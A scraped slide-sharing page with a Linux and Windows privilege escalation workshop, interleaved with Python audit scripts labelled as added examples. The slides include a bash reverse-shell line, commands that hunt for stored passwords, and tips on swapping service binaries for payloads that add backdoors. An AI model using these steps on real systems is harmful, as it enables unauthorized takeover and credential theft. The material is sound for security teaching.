DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Modernizing Legacy Systems Using Ballerina
Modernizing Legacy Systems Using BallerinaModernizing Legacy Systems Using Ballerina
Modernizing Legacy Systems Using Ballerina
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch Tuesday
 
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization -  The evolution of API governanceAPI Governance and Monetization -  The evolution of API governance
API Governance and Monetization - The evolution of API governance
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptx
 
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data PlatformLess Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
 
Choreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringChoreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software Engineering
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cf
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 

Privilege escalation from 1 to 0 Workshop

  • 1. By : Hossam Mohamed Privilege Escalation From 1 To 0
  • 2. By : Hossam Mohamed Privilege Escalation From 1 To 0 About ME • Hossam Mohamed • Egyptian , 18 Years Old • Working As cyber security analyst @ Boraq-Group • Working in Cyber Security for 2 years :) • PHP, Python Lover • GitHub , Twitter , LinkedIn @wazehell
  • 3. Privilege Escalation From 1 To 0 Understanding Privilege Escalation components Linux Privilege Escalation Windows Privilege Escalation Some Demo's What Will Be Covered ? By : Hossam Mohamed
  • 4. Privilege Escalation From 1 To 0 By : Hossam Mohamed Why I need Privilege Escalation ? • Why Everyone Want to get high ? • Limited Access Or Full Compromised Machine ? • Opportunity to more maintain access • More Control Teg : hacktrick_pef10 For Who
  • 5. Privilege Escalation From 1 To 0 By : Hossam Mohamed Privilege Escalation Types Horizontal Privilege Escalation Vertical Privilege Escalation Horizontal normal user accesses functions or content related for other users Vertical also known as privilege elevation lower privilege user>higher privilege user
  • 6. Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user
  • 7. Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user System Root Sudo Users - Services Users Adminisrators P Users Users - Services Users
  • 8. Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user Windows • Known exploits • vulnerable windows services • misconfigurations Linux • Kernel Exploit • Known Exploits • Exploiting Services • Exploiting Sudo Users • misconfigurations
  • 9. Privilege Escalation From 1 To 0 By : Hossam Mohamed Let's Talk A little bit about Kernel • A kernel is the core component of any operating system • Low level task (disk management , memory management) • Memory management and I/O • Link Between Hardware (I/O) , Apps , CPU and Memory . • Device management through the use of device drivers kernel is responsible !
  • 10. Privilege Escalation From 1 To 0 By : Hossam Mohamed We Don't Need to know too much about kernel at this moment
  • 11. Privilege Escalation From 1 To 0 By : Hossam Mohamed MES Misconfiguration Exploit Vulnerable Service
  • 12. Privilege Escalation From 1 To 0 By : Hossam Mohamed MES Misconfiguration Exploit Vulnerable Service • VulnerableMachine • Exploit ! • Ability To Move Exploit • Ability To Compile and Run • SUID • Sudo Users • Weak file's Permissions • And many more • We will talk about that a lot
  • 13. Privilege Escalation From 1 To 0 By : Hossam Mohamed start with Linux • Kernel Exploitation • Weak password of high privilegeusers • file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape • VulnerableApp / Service • Weak permissionof Jobs/Task • Sudoer • System Misconfiguration
  • 14. Privilege Escalation From 1 To 0 By : Hossam Mohamed Kernel Exploits • Kernel Exploits • Find Stable One Or die() • MCE (Move – compile – Execute) • Problems with Kernel Expliots • Dirty Cow :)
  • 15. Privilege Escalation From 1 To 0 By : Hossam Mohamed Dirty Cow • October 2016 • W Access to Memory Mappings • Inject Or In other word write code into privileged files • Flaw in kernel’s memory subsystem which handles the copy-on-write
  • 16. Privilege Escalation From 1 To 0 By : Hossam Mohamed It's Not A Cow • copy-on-write (COW) ! • W Access to Memory Mappings • Inject Or In other word write code into privileged files • Flaw in kernel’s memory subsystem which handles the copy-on-write • Demo
  • 17. Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks # Passwords Every where Check users without passwords .. maybe you got more privilege ! Check For credentials Are you sudo ! , check etc/shadow John the Ripper are here Password mining (configs – logs – bash_history) Password Policy Weakness
• 18. Password Attacks: Understanding /etc/passwd
  1 => username
  2 => password
  3 => UID
  4 => GID
  5 => user info
  6 => home dir
  7 => shell
  All passwords are in /etc/shadow
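As an added example (not part of the slides), here is a small Python audit of the seven /etc/passwd fields listed above, run over a constructed sample: it flags accounts whose password field is empty, hashes kept in /etc/passwd instead of /etc/shadow, extra UID 0 accounts, and system accounts that still have an interactive shell. The sample lines, the UID 1000 cut-off for system accounts and the list of non-login shells are assumptions, not values from the deck.

```python
# Added example (not from the slides): audit /etc/passwd for weak account entries.
# Field order per slide 18: username:password:UID:GID:user info:home:shell.
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

# Assumed list of shells that refuse interactive login; extend per distribution.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}
SYSTEM_UID_MAX = 999  # assumption: UIDs below 1000 are system/service accounts

# Constructed sample, not a real host's file.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/sh
toor:x:0:0:second root:/root:/bin/bash
guest::1001:1001:Guest:/home/guest:/bin/bash
legacy:$6$saltsalt$notarealhash:1002:1002::/home/legacy:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""


def parse_passwd(text):
    """Parse /etc/passwd content into PasswdEntry records, skipping blank and comment lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % raw)
        entries.append(PasswdEntry(fields[0], fields[1], int(fields[2]), int(fields[3]),
                                   fields[4], fields[5], fields[6]))
    return entries


def audit_passwd(entries):
    """Return (username, finding) pairs a defender would want to review."""
    findings = []
    for e in entries:
        if e.passwd == "":
            # An empty second field means login with no password at all.
            findings.append((e.name, "no password set"))
        elif e.passwd not in ("x", "*") and not e.passwd.startswith("!"):
            # Not the shadow marker and not a locked marker: a hash sits in the
            # world-readable file, where it can be collected for offline cracking.
            findings.append((e.name, "password hash stored in /etc/passwd"))
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "extra UID 0 account"))
        if 0 < e.uid <= SYSTEM_UID_MAX and e.shell not in NOLOGIN_SHELLS:
            findings.append((e.name, "system account with interactive shell"))
    return findings


def audit_file(path="/etc/passwd"):
    """Run the audit against a real passwd file."""
    with open(path) as fh:
        return audit_passwd(parse_passwd(fh.read()))


if __name__ == "__main__":
    for name, issue in audit_passwd(parse_passwd(SAMPLE_PASSWD)):
        print("%-10s %s" % (name, issue))
```

Run it as a script to see the four findings in the sample, or call audit_file() on a host; pair the "system account with interactive shell" finding with the slide's sudo and cron checks, since those are the accounts whose shells are usually never needed.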
• 19. Password Attacks: Logs, History
  cat ~/.bash_history | grep --text "ssh"
  Or whatever: you can pass the password via the command line
  Maybe web CMS configs!
  Admin notes
  Keys
  And many more!
• 20. Escape to Shell: Restricted Shells
  It limits the user's ability and only allows them to perform a subset of system commands
  # So how to kill it?
  # Development environment (python, perl, ruby, go, php, etc.)
  # Redirecting output using redirection operators like >, >>, >|, &>
  # Using the 'exec' builtin, like find . -exec /bin/bash \;
  # Unsetting certain environment variables
  # Specifying filenames or command names that contain slashes
• 22. Cron Jobs... Time Game :)
  # What are cron jobs? Cron jobs, if not configured properly, can be exploited to get root privilege.
  # Are the scripts or binaries in cron jobs writable?
  # Is the cron.d directory writable?
  # Can we write over the cron file itself?
  ls -la /etc/cron.d
  find /etc/cron* -perm -0002 -type f -exec ls -la {} \; -exec cat {} \; 2>/dev/null
  bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
• 23. Sudo
  • Super User, Please Do It!
  • Run as others
  • cat /etc/sudoers
  • What sudoers can do
• 24. # File Permissions
  • Check files
  • Edit and run :)
  • More!
  R = read => 4
  W = write => 2
  X = execute => 1
• 25. # SUID Files
  Allows you to run programs as another user upon execution, or in other words (as root)
  Local exploits or a BoF in a SUID app will make you run as root
  SUID files:
  find / -user root -perm -4000 -print 2>/dev/null
  find / -perm -u=s -type f 2>/dev/null
  find / -user root -perm -4000 -exec ls -ldb {} \;
• 27. Environment Variables
  # Dynamic linker
  # What's the dynamic linker?
  Dot in PATH!
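The three checks on slides 22, 25 and 27 (writable cron files, SUID root binaries, and a "." in PATH) can be scripted as one audit. The following Python is an added example, not code from the deck: its file records are constructed to mirror what os.lstat returns, the SUID baseline is a placeholder allowlist for illustration, and scan_filesystem() is the hook a practitioner would point at a live host.

```python
# Added example (not from the slides): one audit for three Linux misconfigurations.
#  - cron files any user can modify      (slide 22: find /etc/cron* -perm -0002)
#  - SUID root binaries not in a baseline (slide 25: find / -user root -perm -4000)
#  - "." or an empty entry in PATH        (slide 27)
import os
import stat

# Constructed sample: (path, st_mode, st_uid) tuples as os.lstat would report them.
SAMPLE_FILES = [
    ("/etc/cron.d/backup",        stat.S_IFREG | 0o644, 0),
    ("/etc/cron.d/cleanup",       stat.S_IFREG | 0o666, 0),                   # world-writable
    ("/etc/cron.daily/report.sh", stat.S_IFREG | 0o775, 0),                   # group-writable only
    ("/usr/bin/passwd",           stat.S_IFREG | stat.S_ISUID | 0o755, 0),    # expected SUID
    ("/usr/bin/sudo",             stat.S_IFREG | stat.S_ISUID | 0o755, 0),
    ("/opt/legacy/backup_tool",   stat.S_IFREG | stat.S_ISUID | 0o755, 0),    # unexpected SUID root
    ("/home/alice/tool",          stat.S_IFREG | stat.S_ISUID | 0o755, 1000), # SUID, not root-owned
]

# Placeholder allowlist; a real baseline comes from the distribution's package manifests.
SUID_BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/mount", "/bin/umount"}


def world_writable_cron(files):
    """Regular files under /etc/cron* whose 'other' write bit is set."""
    return [p for p, mode, _ in files
            if p.startswith("/etc/cron") and stat.S_ISREG(mode) and mode & stat.S_IWOTH]


def unexpected_suid_root(files, baseline=SUID_BASELINE):
    """SUID files owned by root (uid 0) that the baseline does not account for."""
    return [p for p, mode, uid in files
            if stat.S_ISREG(mode) and mode & stat.S_ISUID and uid == 0 and p not in baseline]


def risky_path_entries(path_value):
    """Indices of PATH entries that resolve relative to the current directory ('.' or empty)."""
    return [i for i, entry in enumerate(path_value.split(":")) if entry in ("", ".")]


def scan_filesystem(roots=("/etc", "/usr", "/opt")):
    """Collect real (path, mode, uid) records; unreadable entries are skipped."""
    records = []
    for root in roots:
        for dirpath, _, names in os.walk(root):
            for name in names:
                full = os.path.join(dirpath, name)
                try:
                    st = os.lstat(full)
                except OSError:
                    continue
                records.append((full, st.st_mode, st.st_uid))
    return records


if __name__ == "__main__":
    print("world-writable cron:", world_writable_cron(SAMPLE_FILES))
    print("unexpected SUID root:", unexpected_suid_root(SAMPLE_FILES))
    print("risky PATH entries:", risky_path_entries(os.environ.get("PATH", "")))
```

Against a live host, replace SAMPLE_FILES with scan_filesystem() and build SUID_BASELINE from the package manager's file lists; the group-writable cron file in the sample is deliberately not flagged, since it is only writable by the root group, which is the distinction the slide's -perm -0002 makes.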
• 28. Misconfigurations
  Webserver => configs => credentials
  What if we got MySQL credentials?
  Known service exploits
  Modern Linux distributions' security
  ps -ef | grep root
• 29. Exercise
• 30. Day 2
• 31. Windows Access Control
  Only on "NTFS" formatted drives
  Cacls output:
  • F (full access), M (modify access), RX (read and execute access)
  • R (read-only access), W (write-only access)
  • (OI): object inherit, (CI): container inherit
  • (IO): inherit only, (NP): do not propagate inherit
  • (I): permission inherited from parent container
• 32. Windows Integrity Levels (IL)
  Untrusted, Low, Medium, High, System, Protected/Installer
  Check if your user is a local admin!!
• 33. Windows File Permissions
  Overwrite is always a big plus
  Identify writeable files
  Recently created directories
  Default permissions
  icacls / cacls utility
  Accesschk tool
  Write, Read & Execute, Read, Full
• 34. From Local Admin To Domain Admin
  Pass the Hash
  Hashdump
  RDP, add new Domain Admin
  Have some fun
  IT Admin box, Local box, Domain box
• 35. Stealing NTLM From Web!!
  Automatic Logon Policy (WinHTTP)
  https://github.com/blazeinfosec/ssrf-ntlm/
  MySQL LOAD DATA INFILE
  qprocess /server:15.15.45.41
  Nltest
  Outlook CVE-2018-0950
• 36. Stealing NTLM: Outlook CVE-2018-0950
• 37. User Account Control (UAC)
  • A security feature of Windows... isn't! :)
  • Not a security boundary
  • Prevents unauthorized changes to the operating system (run app, etc.)
  • So UAC is an issue for a pen tester!!
  UAC Bypass:
  1. COM handler hijack
  2. Memory injection
  3. Some registry keys like (FodHelper – Eventvwr)
• 38. Credentials
  Credentials are everywhere.
  Configs – Backups
  Admin notes – Plaintext passwords
  Encrypted credentials
  Cached credentials (ftp – vnc, etc.)
  post/windows/gather/credentials/*
  grep => findstr
  c:\sysprep.inf
  c:\sysprep
  c:\sysprep.xml
  c:\Unattended.xml
• 39. Credentials: Passwords in the Registry
  Putty – SNMP
  reg query HKLM /f password /t REG_SZ /s
• 40. Credentials
  Have Groups.xml!
  dir /s *pass* == *cred* == *vnc* == *.config*
  findstr /si password *.xml *.ini *.txt
  Password on paper!
• 41. Users Information
  Local administrators check: net localgroup administrators
  Domain user listing: Get-ADUser -Filter * -SearchBase "dc=domain,dc=local" | select Name,SID
• 42. Users Information
  User listing: net users
  Sessions: qwinsta
• 43. Missing Patches
  Kernel exploits
  Discovery of missing patches:
  wmic qfe get Caption,Description,HotFixID,InstalledOn
  Or kill AV
  post/windows/gather/enum_patches
• 44. Applications: Local Exploit
  Our friend exploit-db
  Maybe it's not about privilege escalation exploits only: an RCE with system privilege!!
  You may have another way!
  post/multi/recon/local_exploit_suggester
• 45. Services Exploitation
  As we see, Windows privilege escalation techniques start from here ☺
  Quick look at exploit-db: more than 60% of Windows privilege escalation exploits are about services!
  It sounds like "ohh, I think that's easy"
  Good to have PowerShell knowledge
  Let's get involved!!
• 46. Services Exploitation
  Identify running services.
  net config / services under your control
  Say hello to your new friend "sc"
  What's sc?
  sc query: list all of the services on the machine
  post/windows/gather/enum_services
• 47. Services Exploitation
  Let's start analysing what we got!
  Local administrator or service account?
  Local System – Network Service – Local Service
  Do you really want to get another limited shell?
  Just get the hashes, go home to crack them and come back
  Get-ADDefaultDomainPasswordPolicy / I think you will know how much time it will take to crack!!
• 48. Services Exploitation: Normal Service Exploitation
  Some checks:
  Are services starting automatically?
  Are services controlled?
  Can you overwrite the service binary? Congratulations, you own the box
  Note: "In modern OSes, sometimes when you replace a service binary with a Metasploit payload you will lose the shell after 1 min. That's because the app crashes, so make sure that your payload does a simple task", like installing a backdoor or adding a user.
• 49. Services Exploitation
  Want some CVEs in your CV? I will tell you a trick :")
  "Unquoted service paths" or trusted paths
  What's that? It's about spaces and "
  C:\Program Files\blabla app\start.exe
  C:\Program*Files\blabla*app\start.exe
  All of the * are vulnerable points
  If plan A failed, there are 25 other letters of the alphabet to try :")
• 50. Services Exploitation: Identify Unquoted Services
  wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
  Identify the service account level!!
  Check write access! icacls <service path>
  Check control: net config | findstr <service name>
  Or if it starts automatically, check if you can restart the box
  exploit/windows/local/trusted_service_path
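An added example (not from the slides) that scripts the two checks above: it finds services whose unquoted PathName contains a space, works out which directories' ACLs must not grant writes to ordinary users, and parses icacls output for write rights held by low-privilege groups. The service listing is a constructed sample in the key=value shape of wmic ... /format:list, both icacls outputs are constructed, and the list of low-privilege principals is an assumption; the rights abbreviations are the ones icacls prints.

```python
# Added example (not from the slides): detect unquoted service paths and weak
# directory ACLs from constructed wmic / icacls output.
import re
import ntpath

# Constructed sample in the shape of: wmic service get name,pathname,startmode /format:list
SAMPLE_WMIC_LIST = """
Name=wuauserv
PathName=C:\\Windows\\system32\\svchost.exe -k netsvcs
StartMode=Auto

Name=VendorAgent
PathName=C:\\Program Files\\Vendor App\\agent.exe
StartMode=Auto

Name=VendorAgent2
PathName="C:\\Program Files\\Vendor App\\agent2.exe" -svc
StartMode=Auto

Name=LegacyBackup
PathName=C:\\Tools\\backup service\\bin\\backup.exe /run
StartMode=Manual
"""

# Constructed samples of `icacls <dir>` output: a healthy directory and a weak one.
SAMPLE_ICACLS_PROGRAM_FILES = """\
C:\\Program Files NT SERVICE\\TrustedInstaller:(F)
                 NT AUTHORITY\\SYSTEM:(M)
                 BUILTIN\\Administrators:(M)
                 BUILTIN\\Users:(RX)
                 BUILTIN\\Users:(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_ICACLS_TOOLS = """\
C:\\Tools\\backup service BUILTIN\\Users:(OI)(CI)(M)
                        BUILTIN\\Administrators:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
"""

LOW_PRIV_PRINCIPALS = {"users", "authenticated users", "everyone", "interactive"}  # assumed
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}  # full, modify, write, write data, add file


def parse_wmic_list(text):
    """Turn key=value blocks separated by blank lines into one dict per service."""
    services, current = [], {}
    for line in text.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            current[key.strip()] = value.strip()
        elif current:
            services.append(current)
            current = {}
    if current:
        services.append(current)
    return services


def unquoted_service_paths(services):
    """(name, executable, corrected PathName) for unquoted executables containing a space."""
    findings = []
    for svc in services:
        path = svc.get("PathName", "")
        if not path or path.startswith('"'):
            continue  # quoted: the service controller knows where the executable ends
        m = re.match(r"(.+?\.exe)(.*)$", path, re.IGNORECASE)
        if m and " " in m.group(1):
            findings.append((svc["Name"], m.group(1), '"%s"%s' % (m.group(1), m.group(2))))
    return findings


def search_directories(exe):
    """Directories where an unquoted path is ambiguous, i.e. whose ACLs must deny user writes.
    For C:\\A B\\C D\\x.exe the ambiguity lies in C:\\ and C:\\A B."""
    dirs = [ntpath.dirname(exe[:i]) for i, ch in enumerate(exe) if ch == " "]
    return sorted(set(dirs), key=dirs.index)


def parse_icacls(text, path):
    """Parse `icacls <path>` output into (principal, set of rights) pairs."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # only the first line carries the path prefix
        m = re.match(r"(.+?):((?:\([A-Za-z,]*\))+)$", line)
        if not m:
            continue  # blank or summary line
        groups = re.findall(r"\(([A-Za-z,]*)\)", m.group(2))
        entries.append((m.group(1).strip(), {r for g in groups for r in g.split(",")}))
    return entries


def weak_write_acl(text, path):
    """Low-privilege principals holding write rights on the directory."""
    weak = []
    for principal, rights in parse_icacls(text, path):
        if principal.split("\\")[-1].lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            weak.append((principal, sorted(rights & WRITE_RIGHTS)))
    return weak
```

The fix for each finding is the corrected PathName the function returns, applied with sc config <name> binPath= "<quoted path>" (the inner quotes escaped as \" on the cmd line); a service is only a real problem when one of its search_directories() also shows up in weak_write_acl(), which is why both checks belong together.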
• 51. Services Exploitation: Registry Permissions
  It's not common: "only Administrators have write permission by default"
  But! It's easy to exploit
  Services listing in regedit: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
  Take a look and check if you can change the path! Good luck!
  If you are in a Windows box, GUI access is just an option; it depends on you!
• 52. Named Pipes Exploitation
  What are pipes?!
  IO Ninja
  PipeList: check your pipes
  Metasploit: getsystem
  Fuzzing demo
• 53. DLL Injection
  Windows can dynamically load DLLs
  What if a DLL is missing?
  LoadLibrary("iamalib.dll")
  LoadLibrary("c:\program files\iamalib.dll")
• 54. DLL Injection
  Not found? Windows attempts to locate the DLL by searching a well-defined set of directories
  "DLL preloading attack" or "binary planting attack"
  How does the search work?
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
• 55. More Exploits
  CVE-2018-1038 "Total Meltdown": Windows 7 & 2008 R2
  Some kernel exploits: Windows 10
  https://blog.xpnsec.com/total-meltdown-cve-2018-1038/
  Also there is a good book on kernel exploitation: "A Guide to Kernel Exploitation: Attacking the Core"
• 56. AutoRun
  AutoRuns tool
  Check paths
  Can you overwrite?
  Restart
  Got SYSTEM account :")
• 57. Binary Replacements
  Check imported binary: C:\Windows\System32\sethc.exe
  Registry check:
  • RunAs
  • RunOnce
  • RenameOnReboot
  • AlwaysInstallElevated
  • SRP policy enumeration
• 58. Other Checks
  • Virtual image backups / storage: VMDK – VHD / VHDX – OVA – ISO – IMG
  • Source code of running applications
  • Default passwords for installed applications
  • Default configuration file locations
  What's stored on network shares?
  Task manager
• 59. I think this is the end :") Nice to meet you all!! @wazehell